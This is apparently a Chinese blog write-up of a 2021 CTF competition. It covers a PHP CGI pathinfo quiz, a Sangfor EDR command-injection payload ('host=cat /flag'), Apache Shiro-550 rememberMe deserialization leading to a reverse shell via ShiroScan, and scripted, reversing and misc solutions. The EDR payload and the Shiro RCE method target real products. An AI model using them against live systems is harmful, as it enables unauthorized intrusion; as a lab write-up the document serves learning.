2月5日
比赛情况:
data:image/s3,"s3://crabby-images/33719/3371910915f468b4d2a0bec8124f87e96a660c4f" alt="rank"
小比赛
data:image/s3,"s3://crabby-images/bd8da/bd8da315c1a0387c8e36853dfbebbdd382bce590" alt="rank"
主办方平台关太快了2333,睡了一觉起来连平台都没了
Sign
Choice
PHP CGI解析漏洞出现的原因是( )
A.cgi.fix_pathi配置错误
B.cgi.fix_pathinfo配置错误
C.phpinfo配置错误
D.cgi.fix__status_en配置错误
很显然是cgi.fix_pathinfo
配置错误,当设置了cgi.fix_pathinfo = 1时,PHP就会以’/‘为分割符从最后一个文件开始向前找存在的文件去执行,例如/upload/a.jpg/b.php
.
扭转乾坤
扫码得flag
data:image/s3,"s3://crabby-images/3e80d/3e80d8720ee6723e27121964e85fa8d627c8e7ba" alt="image-20210205172001695"
Web
EDR
深信服载入史册
直接payload打
data:image/s3,"s3://crabby-images/de5e6/de5e6f88b2b47a49d70d67c87d20b70ad00a60d4" alt="image-20210205134031474"
Payload:
./?strip_slashes=system&host=cat /flag
这题去年有过,是作为线下赛的题目,当时没外网,只能硬审,或者…记得payload,毕竟太有名了…
shiro
Shiro remeberMe反序列化漏洞(Shiro-550)
用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞
data:image/s3,"s3://crabby-images/1bf4d/1bf4d79dc90132803e56c48e3b451524dde22dca" alt="image-20210205135031033"
可以如 参考文章 所示,利用shiro.py
生成payload
data:image/s3,"s3://crabby-images/040f2/040f2c304e84b3f56759bde3cb9afa58c319547e" alt="image-20210205135241419"
当然后来才发现更简单的,直接用 ShiroScan
工具,可以用DNSlog的方式,也可以反弹shell,这里直接反弹shell
data:image/s3,"s3://crabby-images/74d59/74d59cbeb83e6c6ad6e9de09864b5411fb73c686" alt="image-20210205135442119"
成功弹到shell
data:image/s3,"s3://crabby-images/ff88e/ff88e63df81a8204fdde2237e3eab707e9da420c" alt="image-20210205135511988"
fast x 3
老脚本大师了
data:image/s3,"s3://crabby-images/0a477/0a4772480494c14bebb649c6807bf2fd7814a302" alt="image-20210205135615967"
写个py脚本即可,直接上payload,蹩脚编程,师傅们见谅…
# -*- coding: UTF-8 -*-
"""
@Time : 2021/2/5 9:22
@Auth : gyy
@Blog :http://err0r.top
"""
import requests
import collections
url = "http://180.109.90.207:23891/"
session = requests.session()
data = {
"submit": "提交"
}
responses = session.get(url)
print(responses.content.decode('utf-8'))
print ("1--------------------------------取字符串")
cal = responses.text.replace("\r", "").replace('\n', "").replace(" ", "").split('<b>')[1].split('</b>')[0].replace("<divid=\"math\">","").replace("</div>","")
print (cal)
print ("2--------------------------------计数")
str = collections.Counter(cal)
str1 = dict(str)
print(str1)
print ("3--------------------------------排序")
from collections import OrderedDict
str2 = OrderedDict(sorted(str1.items(), key=lambda x:x[1]))
print(str2)
print ("4--------------------------------取key")
val = ""
for i in str2:
print(i)
val += i
val = val
print(val)
print ("5--------------------------------赋data")
data['res'] = val
print(data)
print ("6--------------------------------提交")
post_responses = session.post(url, data=data).content.decode('utf-8')
print(post_responses)
编编改改凑合用
data:image/s3,"s3://crabby-images/3a93d/3a93dfccc6c84b55da88fc06b3cc8e9da042a219" alt="image-20210205140020576"
Apk
Des
2015ISCC的题目改题没有题目的题目
主要代码
public boolean check() {
byte[] b2 = {103, 112, 111, 49, 61, 113, 117, 109, 76, 108, 77, 57, 59, 90, 64, 105, 33, 89, 74, 113, 92, 84, 87, 113, 105, 65, 35, 74, 93, 73, 43, 120};
byte[] b3 = this.result1.getBytes();
for (int j = 0; j < b3.length; j++) {
Log.d("test", ((byte) (b3[j] ^ j)));
}
if (b3.length != b2.length) {
return false;
}
for (int j2 = 0; j2 < b2.length; j2++) {
if ((b3[j2] ^ b2[j2]) != j2) {
return false;
}
}
return true;
}
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pyDes import *
import base64
V0 = [103, 112, 111, 49, 61, 113, 117, 109, 76, 108, 77, 57, 59, 90, 64, 105, 33, 89, 74, 113, 92, 84, 87, 113, 105, 65, 35, 74, 93, 73, 43, 120]
def DeCheck(str):
v1 = []
for i in range(len(str)):
v1.append(chr(str[i] ^ i))
xx = "".join(v1)
##print xx
return base64.b64decode(xx)
if __name__ == '__main__':
key = 'ilovedes'
iv = '\x01\x02\x03\x04\x05\x06\x07\x08'
k = des(key, CBC, iv, pad=None, padmode=PAD_PKCS5)
flag = k.decrypt(DeCheck(V0))
print "Your flag is: " + flag
data:image/s3,"s3://crabby-images/434d5/434d51320339c8ccecce35893b57ecb17d3a3cbb" alt="image-20210205140432528"
data:image/s3,"s3://crabby-images/7dc7d/7dc7dc2410c52a2ac6fbb0d70b3b861085461422" alt="QQ图片20210205171005"
参考链接:http://bobao.360.cn/ctf/learning/136.html
Misc
DTMF
电话音,网上有在线识别网站
http://dialabc.com/sound/detect/index.html
格式要求.wav
,先用ffmpeg转格式
data:image/s3,"s3://crabby-images/8fd39/8fd39ca05a838f750b7433174b00aa6102f40097" alt="image-20210205140704301"
再放上去识别
data:image/s3,"s3://crabby-images/96c80/96c805c7aca09b460ee8c0e67de120e6b2639f0b" alt="image-20210205140736060"
CnHongKe{A18D3B18C*231#}
HalfQR
二维码修复网站 https://merricx.github.io/qrazybox/
data:image/s3,"s3://crabby-images/61170/6117031308f184c6fbabe01d947ea7c537a0d39d" alt="QR"
手 撸
data:image/s3,"s3://crabby-images/9bb56/9bb56183deef01ed00c05cc90b3cba3880994fa6" alt="image-20210205165950957"
data:image/s3,"s3://crabby-images/e7039/e7039587b368cf9f183cc96d4c7f1071cb461de7" alt="image-20210205170018477"
然后
data:image/s3,"s3://crabby-images/2a4b3/2a4b34311e3637d7950e62422e2cfc9bf0b3c836" alt="image-20210205165843064"
最后
CnHongKe{f88ae38f450e76d3c92410e3650df67}
也可以手算…毕竟数据域的半边东西给了
总结
这些题目作为线下赛题目是难了,毕竟去年有过一次线下,线上赛就不说了,神仙乱斗2333,还不用交WP,希望主办方能完善赛制,首先赛后都不用交WP是挺离谱的,其次题目的质量…其实还行,但作为线上还是简单了,一篇wp却写不出多少东西,通篇八题仅仅一千字,可能是题目问题,也有一部分我的问题,总之多多总结吧。
data:image/s3,"s3://crabby-images/bca76/bca768f7fb40f2065020f26609e5a82ca415135d" alt=""
懂的都懂2333
还是有些收获的,提前祝大家新年快乐!
评论请遵守评论公德,博主会不定时检查评论并进行回复。